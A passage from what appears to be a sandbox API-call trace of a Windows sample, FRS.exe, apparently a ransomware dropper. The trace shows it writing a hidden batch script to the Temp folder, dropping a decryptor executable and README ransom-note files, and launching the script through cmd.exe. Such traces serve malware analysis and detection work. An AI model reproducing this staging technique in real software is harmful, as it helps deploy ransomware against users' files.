%x") returned 0x15 [0032.882] LoadStringA (in: hInstance=0x400000, uID=0xffdc, lpBuffer=0x18eec8, cchBufferMax=4096 | out: lpBuffer="Assertion failed") returned 0x10 [0032.882] LoadStringA (in: hInstance=0x400000, uID=0xffef, lpBuffer=0x18eec8, cchBufferMax=4096 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29 [0032.882] LoadStringA (in: hInstance=0x400000, uID=0xffd7, lpBuffer=0x18eec8, cchBufferMax=4096 | out: lpBuffer="Invalid argument") returned 0x10 [0032.882] LoadStringA (in: hInstance=0x400000, uID=0xffee, lpBuffer=0x18eec8, cchBufferMax=4096 | out: lpBuffer="Error creating variant or safe array") returned 0x24 [0032.882] LoadStringA (in: hInstance=0x400000, uID=0xffeb, lpBuffer=0x18eec8, cchBufferMax=4096 | out: lpBuffer="Variant method calls not supported") returned 0x22 [0032.882] LoadStringA (in: hInstance=0x400000, uID=0xffd2, lpBuffer=0x18eec8, cchBufferMax=4096 | out: lpBuffer="Invalid variant operation") returned 0x19 [0032.882] LoadStringA (in: hInstance=0x400000, uID=0xffd1, lpBuffer=0x18eec8, cchBufferMax=4096 | out: lpBuffer="Invalid variant type conversion") returned 0x1f [0032.882] LoadStringA (in: hInstance=0x400000, uID=0xffe4, lpBuffer=0x18eec8, cchBufferMax=4096 | out: lpBuffer="Stack overflow") returned 0xe [0032.882] LoadStringA (in: hInstance=0x400000, uID=0xffe5, lpBuffer=0x18eec8, cchBufferMax=4096 | out: lpBuffer="Control-C hit") returned 0xd [0032.883] LoadStringA (in: hInstance=0x400000, uID=0xffe6, lpBuffer=0x18eec8, cchBufferMax=4096 | out: lpBuffer="Privileged instruction") returned 0x16 [0032.883] LoadStringA (in: hInstance=0x400000, uID=0xffe3, lpBuffer=0x18eec8, cchBufferMax=4096 | out: lpBuffer="Access violation") returned 0x10 [0032.883] LoadStringA (in: hInstance=0x400000, uID=0xffe1, lpBuffer=0x18eec8, cchBufferMax=4096 | out: lpBuffer="Invalid class typecast") returned 0x16 [0032.883] LoadStringA (in: hInstance=0x400000, uID=0xffff, lpBuffer=0x18eec8, cchBufferMax=4096 | out: lpBuffer="Floating point underflow") returned 0x18 [0032.883] LoadStringA (in: hInstance=0x400000, uID=0xfffe, lpBuffer=0x18eec8, cchBufferMax=4096 | out: lpBuffer="Floating point overflow") returned 0x17 [0032.883] LoadStringA (in: hInstance=0x400000, uID=0xfffd, lpBuffer=0x18eec8, cchBufferMax=4096 | out: lpBuffer="Floating point division by zero") returned 0x1f [0032.883] LoadStringA (in: hInstance=0x400000, uID=0xfffc, lpBuffer=0x18eec8, cchBufferMax=4096 | out: lpBuffer="Invalid floating point operation") returned 0x20 [0032.883] LoadStringA (in: hInstance=0x400000, uID=0xfffb, lpBuffer=0x18eec8, cchBufferMax=4096 | out: lpBuffer="Integer overflow") returned 0x10 [0032.883] LoadStringA (in: hInstance=0x400000, uID=0xfffa, lpBuffer=0x18eec8, cchBufferMax=4096 | out: lpBuffer="Range check error") returned 0x11 [0032.883] LoadStringA (in: hInstance=0x400000, uID=0xfff9, lpBuffer=0x18eec8, cchBufferMax=4096 | out: lpBuffer="Division by zero") returned 0x10 [0032.883] LoadStringA (in: hInstance=0x400000, uID=0xfff8, lpBuffer=0x18eec8, cchBufferMax=4096 | out: lpBuffer="Invalid numeric input") returned 0x15 [0032.883] LoadStringA (in: hInstance=0x400000, uID=0xfff7, lpBuffer=0x18eec8, cchBufferMax=4096 | out: lpBuffer="Disk full") returned 0x9 [0032.883] LoadStringA (in: hInstance=0x400000, uID=0xfff6, lpBuffer=0x18eec8, cchBufferMax=4096 | out: lpBuffer="Read beyond end of file") returned 0x17 [0032.883] LoadStringA (in: hInstance=0x400000, uID=0xfff5, lpBuffer=0x18eec8, cchBufferMax=4096 | out: lpBuffer="File access denied") returned 0x12 [0032.883] LoadStringA (in: hInstance=0x400000, uID=0xfff4, lpBuffer=0x18eec8, cchBufferMax=4096 | out: lpBuffer="Too many open files") returned 0x13 [0032.883] LoadStringA (in: hInstance=0x400000, uID=0xfff3, lpBuffer=0x18eec8, cchBufferMax=4096 | out: lpBuffer="Invalid filename") returned 0x10 [0032.883] LoadStringA (in: hInstance=0x400000, uID=0xfff2, lpBuffer=0x18eec8, cchBufferMax=4096 | out: lpBuffer="File not found") returned 0xe [0032.883] LoadStringA (in: hInstance=0x400000, uID=0xfff0, lpBuffer=0x18eeb4, cchBufferMax=4096 | out: lpBuffer="Out of memory") returned 0xd [0032.883] LoadStringA (in: hInstance=0x400000, uID=0xffe0, lpBuffer=0x18eeb4, cchBufferMax=4096 | out: lpBuffer="Invalid pointer operation") returned 0x19 [0032.883] GetVersionExA (in: lpVersionInformation=0x18fe4c*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x18, dwMinorVersion=0x18fef8, dwBuildNumber=0x7712aab5, dwPlatformId=0x9dd25ae6, szCSDVersion="þÿÿÿt\x99\x0ew\x81¥øt\x84þ\x18") | out: lpVersionInformation=0x18fe4c*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0032.883] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x74f70000 [0032.883] GetProcAddress (hModule=0x74f70000, lpProcName="GetDiskFreeSpaceExA") returned 0x74f97404 [0032.883] GetThreadLocale () returned 0x409 [0032.883] GetSystemMetrics (nIndex=42) returned 0 [0033.125] GetThreadLocale () returned 0x409 [0033.126] GetLocaleInfoA (in: Locale=0x409, LCType=0x44, lpLCData=0x18fd24, cchData=256 | out: lpLCData="Jan") returned 4 [0033.126] GetLocaleInfoA (in: Locale=0x409, LCType=0x38, lpLCData=0x18fd24, cchData=256 | out: lpLCData="January") returned 8 [0033.126] GetLocaleInfoA (in: Locale=0x409, LCType=0x45, lpLCData=0x18fd24, cchData=256 | out: lpLCData="Feb") returned 4 [0033.126] GetLocaleInfoA (in: Locale=0x409, LCType=0x39, lpLCData=0x18fd24, cchData=256 | out: lpLCData="February") returned 9 [0033.126] GetLocaleInfoA (in: Locale=0x409, LCType=0x46, lpLCData=0x18fd24, cchData=256 | out: lpLCData="Mar") returned 4 [0033.126] GetLocaleInfoA (in: Locale=0x409, LCType=0x3a, lpLCData=0x18fd24, cchData=256 | out: lpLCData="March") returned 6 [0033.126] GetLocaleInfoA (in: Locale=0x409, LCType=0x47, lpLCData=0x18fd24, cchData=256 | out: lpLCData="Apr") returned 4 [0033.126] GetLocaleInfoA (in: Locale=0x409, LCType=0x3b, lpLCData=0x18fd24, cchData=256 | out: lpLCData="April") returned 6 [0033.126] GetLocaleInfoA (in: Locale=0x409, LCType=0x48, lpLCData=0x18fd24, cchData=256 | out: lpLCData="May") returned 4 [0033.126] GetLocaleInfoA (in: Locale=0x409, LCType=0x3c, lpLCData=0x18fd24, cchData=256 | out: lpLCData="May") returned 4 [0033.126] GetLocaleInfoA (in: Locale=0x409, LCType=0x49, lpLCData=0x18fd24, cchData=256 | out: lpLCData="Jun") returned 4 [0033.126] GetLocaleInfoA (in: Locale=0x409, LCType=0x3d, lpLCData=0x18fd24, cchData=256 | out: lpLCData="June") returned 5 [0033.126] GetLocaleInfoA (in: Locale=0x409, LCType=0x4a, lpLCData=0x18fd24, cchData=256 | out: lpLCData="Jul") returned 4 [0033.126] GetLocaleInfoA (in: Locale=0x409, LCType=0x3e, lpLCData=0x18fd24, cchData=256 | out: lpLCData="July") returned 5 [0033.126] GetLocaleInfoA (in: Locale=0x409, LCType=0x4b, lpLCData=0x18fd24, cchData=256 | out: lpLCData="Aug") returned 4 [0033.126] GetLocaleInfoA (in: Locale=0x409, LCType=0x3f, lpLCData=0x18fd24, cchData=256 | out: lpLCData="August") returned 7 [0033.126] GetLocaleInfoA (in: Locale=0x409, LCType=0x4c, lpLCData=0x18fd24, cchData=256 | out: lpLCData="Sep") returned 4 [0033.126] GetLocaleInfoA (in: Locale=0x409, LCType=0x40, lpLCData=0x18fd24, cchData=256 | out: lpLCData="September") returned 10 [0033.126] GetLocaleInfoA (in: Locale=0x409, LCType=0x4d, lpLCData=0x18fd24, cchData=256 | out: lpLCData="Oct") returned 4 [0033.126] GetLocaleInfoA (in: Locale=0x409, LCType=0x41, lpLCData=0x18fd24, cchData=256 | out: lpLCData="October") returned 8 [0033.126] GetLocaleInfoA (in: Locale=0x409, LCType=0x4e, lpLCData=0x18fd24, cchData=256 | out: lpLCData="Nov") returned 4 [0033.126] GetLocaleInfoA (in: Locale=0x409, LCType=0x42, lpLCData=0x18fd24, cchData=256 | out: lpLCData="November") returned 9 [0033.126] GetLocaleInfoA (in: Locale=0x409, LCType=0x4f, lpLCData=0x18fd24, cchData=256 | out: lpLCData="Dec") returned 4 [0033.126] GetLocaleInfoA (in: Locale=0x409, LCType=0x43, lpLCData=0x18fd24, cchData=256 | out: lpLCData="December") returned 9 [0033.126] GetLocaleInfoA (in: Locale=0x409, LCType=0x37, lpLCData=0x18fd24, cchData=256 | out: lpLCData="Sun") returned 4 [0033.126] GetLocaleInfoA (in: Locale=0x409, LCType=0x30, lpLCData=0x18fd24, cchData=256 | out: lpLCData="Sunday") returned 7 [0033.126] GetLocaleInfoA (in: Locale=0x409, LCType=0x31, lpLCData=0x18fd24, cchData=256 | out: lpLCData="Mon") returned 4 [0033.126] GetLocaleInfoA (in: Locale=0x409, LCType=0x2a, lpLCData=0x18fd24, cchData=256 | out: lpLCData="Monday") returned 7 [0033.126] GetLocaleInfoA (in: Locale=0x409, LCType=0x32, lpLCData=0x18fd24, cchData=256 | out: lpLCData="Tue") returned 4 [0033.126] GetLocaleInfoA (in: Locale=0x409, LCType=0x2b, lpLCData=0x18fd24, cchData=256 | out: lpLCData="Tuesday") returned 8 [0033.126] GetLocaleInfoA (in: Locale=0x409, LCType=0x33, lpLCData=0x18fd24, cchData=256 | out: lpLCData="Wed") returned 4 [0033.126] GetLocaleInfoA (in: Locale=0x409, LCType=0x2c, lpLCData=0x18fd24, cchData=256 | out: lpLCData="Wednesday") returned 10 [0033.126] GetLocaleInfoA (in: Locale=0x409, LCType=0x34, lpLCData=0x18fd24, cchData=256 | out: lpLCData="Thu") returned 4 [0033.126] GetLocaleInfoA (in: Locale=0x409, LCType=0x2d, lpLCData=0x18fd24, cchData=256 | out: lpLCData="Thursday") returned 9 [0033.126] GetLocaleInfoA (in: Locale=0x409, LCType=0x35, lpLCData=0x18fd24, cchData=256 | out: lpLCData="Fri") returned 4 [0033.126] GetLocaleInfoA (in: Locale=0x409, LCType=0x2e, lpLCData=0x18fd24, cchData=256 | out: lpLCData="Friday") returned 7 [0033.126] GetLocaleInfoA (in: Locale=0x409, LCType=0x36, lpLCData=0x18fd24, cchData=256 | out: lpLCData="Sat") returned 4 [0033.126] GetLocaleInfoA (in: Locale=0x409, LCType=0x2f, lpLCData=0x18fd24, cchData=256 | out: lpLCData="Saturday") returned 9 [0033.126] GetThreadLocale () returned 0x409 [0033.126] GetLocaleInfoA (in: Locale=0x409, LCType=0x14, lpLCData=0x18fd80, cchData=256 | out: lpLCData="$") returned 2 [0033.126] GetLocaleInfoA (in: Locale=0x409, LCType=0x1b, lpLCData=0x18fd80, cchData=256 | out: lpLCData="0") returned 2 [0033.126] GetLocaleInfoA (in: Locale=0x409, LCType=0x1c, lpLCData=0x18fd80, cchData=256 | out: lpLCData="0") returned 2 [0033.126] GetLocaleInfoA (in: Locale=0x409, LCType=0xf, lpLCData=0x18fe78, cchData=2 | out: lpLCData=",") returned 2 [0033.126] GetLocaleInfoA (in: Locale=0x409, LCType=0xe, lpLCData=0x18fe78, cchData=2 | out: lpLCData=".") returned 2 [0033.126] GetLocaleInfoA (in: Locale=0x409, LCType=0x19, lpLCData=0x18fd80, cchData=256 | out: lpLCData="2") returned 2 [0033.126] GetLocaleInfoA (in: Locale=0x409, LCType=0x1d, lpLCData=0x18fe78, cchData=2 | out: lpLCData="/") returned 2 [0033.126] GetLocaleInfoA (in: Locale=0x409, LCType=0x1f, lpLCData=0x18fd80, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0033.126] GetThreadLocale () returned 0x409 [0033.126] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x18fd4c, cchData=256 | out: lpLCData="1") returned 2 [0033.126] GetLocaleInfoA (in: Locale=0x409, LCType=0x20, lpLCData=0x18fd80, cchData=256 | out: lpLCData="dddd, MMMM d, yyyy") returned 19 [0033.127] GetThreadLocale () returned 0x409 [0033.127] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x18fd4c, cchData=256 | out: lpLCData="1") returned 2 [0033.127] GetLocaleInfoA (in: Locale=0x409, LCType=0x1e, lpLCData=0x18fe78, cchData=2 | out: lpLCData=":") returned 2 [0033.127] GetLocaleInfoA (in: Locale=0x409, LCType=0x28, lpLCData=0x18fd80, cchData=256 | out: lpLCData="AM") returned 3 [0033.127] GetLocaleInfoA (in: Locale=0x409, LCType=0x29, lpLCData=0x18fd80, cchData=256 | out: lpLCData="PM") returned 3 [0033.127] GetLocaleInfoA (in: Locale=0x409, LCType=0x25, lpLCData=0x18fd80, cchData=256 | out: lpLCData="0") returned 2 [0033.127] GetLocaleInfoA (in: Locale=0x409, LCType=0x23, lpLCData=0x18fd80, cchData=256 | out: lpLCData="0") returned 2 [0033.127] GetLocaleInfoA (in: Locale=0x409, LCType=0x1005, lpLCData=0x18fd80, cchData=256 | out: lpLCData="0") returned 2 [0033.127] GetLocaleInfoA (in: Locale=0x409, LCType=0xc, lpLCData=0x18fe78, cchData=2 | out: lpLCData=",") returned 2 [0033.127] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x74d90000 [0033.127] GetProcAddress (hModule=0x74d90000, lpProcName="VariantChangeTypeEx") returned 0x74d94b29 [0033.127] GetProcAddress (hModule=0x74d90000, lpProcName="VarNeg") returned 0x74de8d54 [0033.127] GetProcAddress (hModule=0x74d90000, lpProcName="VarNot") returned 0x74deb24d [0033.127] GetProcAddress (hModule=0x74d90000, lpProcName="VarAdd") returned 0x74dbc05b [0033.127] GetProcAddress (hModule=0x74d90000, lpProcName="VarSub") returned 0x74dea448 [0033.127] GetProcAddress (hModule=0x74d90000, lpProcName="VarMul") returned 0x74de997d [0033.127] GetProcAddress (hModule=0x74d90000, lpProcName="VarDiv") returned 0x74de9341 [0033.127] GetProcAddress (hModule=0x74d90000, lpProcName="VarIdiv") returned 0x74deae9e [0033.127] GetProcAddress (hModule=0x74d90000, lpProcName="VarMod") returned 0x74deb0f4 [0033.127] GetProcAddress (hModule=0x74d90000, lpProcName="VarAnd") returned 0x74dbc567 [0033.127] GetProcAddress (hModule=0x74d90000, lpProcName="VarOr") returned 0x74deb2e9 [0033.127] GetProcAddress (hModule=0x74d90000, lpProcName="VarXor") returned 0x74deb465 [0033.127] GetProcAddress (hModule=0x74d90000, lpProcName="VarCmp") returned 0x74da586f [0033.128] GetProcAddress (hModule=0x74d90000, lpProcName="VarI4FromStr") returned 0x74da6cdb [0033.128] GetProcAddress (hModule=0x74d90000, lpProcName="VarR4FromStr") returned 0x74daf665 [0033.128] GetProcAddress (hModule=0x74d90000, lpProcName="VarR8FromStr") returned 0x74dae6d8 [0033.128] GetProcAddress (hModule=0x74d90000, lpProcName="VarDateFromStr") returned 0x74db1e8a [0033.128] GetProcAddress (hModule=0x74d90000, lpProcName="VarCyFromStr") returned 0x74dec63b [0033.128] GetProcAddress (hModule=0x74d90000, lpProcName="VarBoolFromStr") returned 0x74daba10 [0033.128] GetProcAddress (hModule=0x74d90000, lpProcName="VarBstrFromCy") returned 0x74db2ff1 [0033.128] GetProcAddress (hModule=0x74d90000, lpProcName="VarBstrFromDate") returned 0x74db09be [0033.128] GetProcAddress (hModule=0x74d90000, lpProcName="VarBstrFromBool") returned 0x74dae8c0 [0033.128] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="") returned 0xfc [0033.128] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x108 [0033.128] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x10c [0033.128] GetEnvironmentVariableA (in: lpName="TMP", lpBuffer=0x346698, nSize=0xff | out: lpBuffer="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp") returned 0x24 [0033.128] GetFileAttributesA (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp")) returned 0x10 [0033.129] GetFullPathNameA (in: lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp", nBufferLength=0x1000, lpBuffer=0x18eeec, lpFilePart=0x18eee8 | out: lpBuffer="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp", lpFilePart=0x18eee8*="Temp") returned 0x24 [0033.129] FindResourceA (hModule=0x400000, lpName="SETT", lpType=0xa) returned 0x4b3b40 [0033.129] LoadResource (hModule=0x400000, hResInfo=0x4b3b40) returned 0x4a1490 [0033.129] LockResource (hResData=0x4a1490) returned 0x4a1490 [0033.129] SizeofResource (hModule=0x400000, hResInfo=0x4b3b40) returned 0x30 [0033.129] SizeofResource (hModule=0x400000, hResInfo=0x4b3b40) returned 0x30 [0033.129] FreeResource (hResData=0x4a1490) returned 0 [0033.129] GetCurrentProcessId () returned 0xa3c [0033.129] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff10 | out: lpPerformanceCount=0x18ff10*=358440479) returned 1 [0033.129] GetFileAttributesA (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat")) returned 0xffffffff [0033.129] FindResourceA (hModule=0x400000, lpName="SCRIPT", lpType=0xa) returned 0x4b3b0c [0033.129] LoadResource (hModule=0x400000, hResInfo=0x4b3b0c) returned 0x4a0a20 [0033.129] LockResource (hResData=0x4a0a20) returned 0x4a0a20 [0033.129] SizeofResource (hModule=0x400000, hResInfo=0x4b3b0c) returned 0xa70 [0033.129] SizeofResource (hModule=0x400000, hResInfo=0x4b3b0c) returned 0xa70 [0033.129] CreateFileA (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0033.130] WriteFile (in: hFile=0x110, lpBuffer=0x345b40*, nNumberOfBytesToWrite=0xa6e, lpNumberOfBytesWritten=0x41da30, lpOverlapped=0x0 | out: lpBuffer=0x345b40*, lpNumberOfBytesWritten=0x41da30*=0xa6e, lpOverlapped=0x0) returned 1 [0033.130] CloseHandle (hObject=0x110) returned 1 [0033.131] FreeResource (hResData=0x4a0a20) returned 0 [0033.131] SetFileAttributesA (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat", dwFileAttributes=0x102) returned 1 [0033.132] SHGetFolderPathA (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x33e810 | out: pszPath="C:\\Users\\5JgHKoaOfdp\\AppData\\Local") returned 0x0 [0033.279] GetTickCount () returned 0x18de3 [0033.279] CreateDirectoryA (lpPathName="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F" (normalized: "c:\\users\\5jghkoaofdp\\appdata\\local\\qb1143663.0f"), lpSecurityAttributes=0x0) returned 1 [0033.279] SetEnvironmentVariableA (lpName="MYFILES", lpValue="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F") returned 1 [0033.279] FindResourceA (hModule=0x400000, lpName="ITEMS", lpType=0xa) returned 0x4b3a94 [0033.279] LoadResource (hModule=0x400000, hResInfo=0x4b3a94) returned 0x434bac [0033.279] SizeofResource (hModule=0x400000, hResInfo=0x4b3a94) returned 0x6bd82 [0033.279] LockResource (hResData=0x434bac) returned 0x434bac [0033.279] VirtualAlloc (lpAddress=0x0, dwSize=0x70000, flAllocationType=0x101000, flProtect=0x4) returned 0x7fe40000 [0033.287] VirtualAlloc (lpAddress=0x0, dwSize=0x70000, flAllocationType=0x101000, flProtect=0x4) returned 0x7fdd0000 [0033.293] VirtualAlloc (lpAddress=0x0, dwSize=0x50000, flAllocationType=0x101000, flProtect=0x4) returned 0x7fd80000 [0033.295] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="Chinese_national_flag.png", cchCount1=25, lpString2="FRS_Decryptor.exe", cchCount2=17) returned 1 [0033.296] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="Chinese_national_flag.png", cchCount1=25, lpString2="READ_ME_HELP_ME.png", cchCount2=19) returned 1 [0033.296] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="FRS_Decryptor.exe", cchCount1=17, lpString2="READ_ME_HELP_ME.png", cchCount2=19) returned 1 [0033.296] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="FRS_Decryptor.exe", cchCount1=17, lpString2="READ_ME_HELP_ME.txt", cchCount2=19) returned 1 [0033.296] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="READ_ME_HELP_ME.png", cchCount1=19, lpString2="READ_ME_HELP_ME.txt", cchCount2=19) returned 1 [0033.296] VirtualFree (lpAddress=0x7fe40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0033.297] VirtualFree (lpAddress=0x7fdd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0033.298] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="FRS_Decryptor.exe", cchCount1=17, lpString2="Chinese_national_flag.png", cchCount2=25) returned 3 [0033.298] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="Chinese_national_flag.png", cchCount1=25, lpString2="Chinese_national_flag.png", cchCount2=25) returned 2 [0033.298] CreateFileA (lpFileName="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\Chinese_national_flag.png" (normalized: "c:\\users\\5jghkoaofdp\\appdata\\local\\qb1143663.0f\\chinese_national_flag.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0033.299] WriteFile (in: hFile=0x124, lpBuffer=0x314180*, nNumberOfBytesToWrite=0x24c1, lpNumberOfBytesWritten=0x18feb8, lpOverlapped=0x0 | out: lpBuffer=0x314180*, lpNumberOfBytesWritten=0x18feb8*=0x24c1, lpOverlapped=0x0) returned 1 [0033.299] CloseHandle (hObject=0x124) returned 1 [0033.300] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="FRS_Decryptor.exe", cchCount1=17, lpString2="FRS_Decryptor.exe", cchCount2=17) returned 2 [0033.300] VirtualAlloc (lpAddress=0x0, dwSize=0x50000, flAllocationType=0x101000, flProtect=0x4) returned 0x7fe60000 [0033.303] CreateFileA (lpFileName="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\FRS_Decryptor.exe" (normalized: "c:\\users\\5jghkoaofdp\\appdata\\local\\qb1143663.0f\\frs_decryptor.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0033.303] WriteFile (in: hFile=0x124, lpBuffer=0x7fe60010*, nNumberOfBytesToWrite=0x4a000, lpNumberOfBytesWritten=0x18feb8, lpOverlapped=0x0 | out: lpBuffer=0x7fe60010*, lpNumberOfBytesWritten=0x18feb8*=0x4a000, lpOverlapped=0x0) returned 1 [0033.306] CloseHandle (hObject=0x124) returned 1 [0033.310] VirtualFree (lpAddress=0x7fe60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0033.311] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="FRS_Decryptor.exe", cchCount1=17, lpString2="READ_ME_HELP_ME.png", cchCount2=19) returned 1 [0033.311] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="READ_ME_HELP_ME.png", cchCount1=19, lpString2="READ_ME_HELP_ME.png", cchCount2=19) returned 2 [0033.312] CreateFileA (lpFileName="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\READ_ME_HELP_ME.png" (normalized: "c:\\users\\5jghkoaofdp\\appdata\\local\\qb1143663.0f\\read_me_help_me.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0033.314] WriteFile (in: hFile=0x124, lpBuffer=0x2e30f0*, nNumberOfBytesToWrite=0x1f4aa, lpNumberOfBytesWritten=0x18feb8, lpOverlapped=0x0 | out: lpBuffer=0x2e30f0*, lpNumberOfBytesWritten=0x18feb8*=0x1f4aa, lpOverlapped=0x0) returned 1 [0033.315] CloseHandle (hObject=0x124) returned 1 [0033.317] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="FRS_Decryptor.exe", cchCount1=17, lpString2="READ_ME_HELP_ME.txt", cchCount2=19) returned 1 [0033.317] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="READ_ME_HELP_ME.png", cchCount1=19, lpString2="READ_ME_HELP_ME.txt", cchCount2=19) returned 1 [0033.317] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="READ_ME_HELP_ME.txt", cchCount1=19, lpString2="READ_ME_HELP_ME.txt", cchCount2=19) returned 2 [0033.317] CreateFileA (lpFileName="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\READ_ME_HELP_ME.txt" (normalized: "c:\\users\\5jghkoaofdp\\appdata\\local\\qb1143663.0f\\read_me_help_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0033.317] WriteFile (in: hFile=0x124, lpBuffer=0x2e30f0*, nNumberOfBytesToWrite=0x393, lpNumberOfBytesWritten=0x18feb8, lpOverlapped=0x0 | out: lpBuffer=0x2e30f0*, lpNumberOfBytesWritten=0x18feb8*=0x393, lpOverlapped=0x0) returned 1 [0033.318] CloseHandle (hObject=0x124) returned 1 [0033.318] FreeResource (hResData=0x434bac) returned 0 [0033.318] GetCommandLineA () returned="\"C:\\Users\\5JgHKoaOfdp\\Desktop\\FRS.exe\" " [0033.318] SetEnvironmentVariableA (lpName="cmdln", lpValue="") returned 1 [0033.319] CreateProcessA (in: lpApplicationName=0x0, lpCommandLine="cmd.exe /c \"\"C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat\" \"C:\\Users\\5JgHKoaOfdp\\Desktop\\FRS.exe\" \"", lpProcessAttributes=0x41da5c, lpThreadAttributes=0x41da5c, bInheritHandles=1, dwCreationFlags=0x20, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x41da68*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x41daac | out: lpCommandLine="cmd.exe /c \"\"C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat\" \"C:\\Users\\5JgHKoaOfdp\\Desktop\\FRS.exe\" \"", lpProcessInformation=0x41daac*(hProcess=0x118, hThread=0x124, dwProcessId=0xa5c, dwThreadId=0xa6c)) returned 1 [0033.465] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0xffffffff) Process: id = "2" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x11c28000" os_pid = "0xa5c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa3c" cmd_line = "cmd.exe /c \"\"C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat\" \"C:\\Users\\5JgHKoaOfdp\\Desktop\\FRS.exe\" \"" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 203 start_va = 0xb10000 end_va = 0xb2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b10000" filename = "" Region: id = 204 start_va = 0xb30000 end_va = 0xb31fff entry_point = 0x0 region_type = private name = "private_0x0000000000b30000" filename = "" Region: id = 205 start_va = 0xb40000 end_va = 0xb4efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b40000" filename = "" Region: id = 206 start_va = 0xb50000 end_va = 0xb8ffff entry_point = 0x0 